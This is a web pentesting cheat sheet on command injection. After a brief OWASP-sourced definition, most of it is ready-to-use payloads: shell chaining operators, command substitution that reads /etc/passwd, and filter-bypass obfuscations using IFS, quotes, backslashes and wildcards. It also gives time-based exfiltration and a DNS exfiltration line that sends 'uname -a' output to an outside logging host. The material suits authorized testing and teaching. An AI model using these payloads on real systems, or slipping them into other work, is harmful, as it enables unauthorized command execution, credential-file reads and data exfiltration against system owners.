Command Injection - Web Applications Pentesting

Command Injection

At a Glance

Command injection is an attack in which the attacker executes arbitrary commands on the host OS via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data to a system shell. 1

Note: Commands are usually executed with the privileges of the vulnerable application.

Command Chaining

<input>; ls
<input>& ls
<input>&& ls
<input>| ls
<input>|| ls

Note: Also try:

  • Prepending a flag or parameter.
  • Removing spaces (<input>;ls).

Chaining Operators

Windows and Unix supported.

SyntaxDescription
%0Acmd1 %0A cmd2Newline. Executes both.
;cmd1 ; cmd2Semi-colon operator. Executes both.
&cmd1 & cmd2Runs command in the background. Executes both.
|cmd1 | cmd2PIPE operator. Sends cmd1's output as cmd2 input.
&&cmd1 && cmd2AND operator. Executes cmd2 if cmd1 succeds.
||cmd1 || cmd2OR operator. Executes cmd2 if cmd1 fails.

I/O Redirection

> /var/www/html/output.txt
< /etc/passwd

Command Substitution

Replace a command output with the command itself.2

<input> `cat /etc/passwd`
<input> $(cat /etc/passwd)

Filter Bypassing

Space filtering 3

Linux

cat</etc/passwd
# bash
${cat,/etc/passwd}
cat${IFS}/etc/passwd
v=$'cat\x20/etc/passwd'&&$v
IFS=,;`cat<<<cat,/etc/passwd`

Windows 4

ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Slash (/) filtering

echo ${HOME:0:1} # /
cat ${HOME:0:1}etc${HOME:0:1}passwd
echo . | tr '!-0' '"-1' # /
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Command filtering

Quotes.

w'h'o'am'i
w"h"o"am"i

Slash.

w\ho\am\i
/\b\i\n/////s\h

At symbol.

who$@ami

Variable expansion.

v=/e00tc/pa00sswd
cat ${v//00/}

Wildcards.

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

Time Based Data Exfiltration 5

time if [ $(uname -a | cut -c1) == L ]; then sleep 5; fi

DNS Based Data Exfiltration 6

dnsbin Example:

host $(uname -a).c2cebb6a3678849a2eee.d.zhack.ca

  1. “Command Injection | OWASP.” OWASP Foundation | Open Source Foundation for Application Security, https://owasp.org/www-community/attacks/Command_Injection. ↩︎

  2. “Command Injection | OWASP.” OWASP Foundation | Open Source Foundation for Application Security, https://owasp.org/www-community/attacks/Command_Injection. ↩︎

  3. https://twitter.com/asdizzle_/status/895244943526170628 ↩︎

  4. https://twitter.com/bugbountynights/status/860102244171227136 ↩︎

  5. Pobereznicenco, Dan. “Exploiting Timed Based RCE – Security Café.” Security Café, 28 Feb. 2017, https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/. ↩︎

  6. ettic-team. “GitHub - Ettic-Team/Dnsbin: The Request.Bin of DNS Request.” GitHub, https://github.com/ettic-team/dnsbin. ↩︎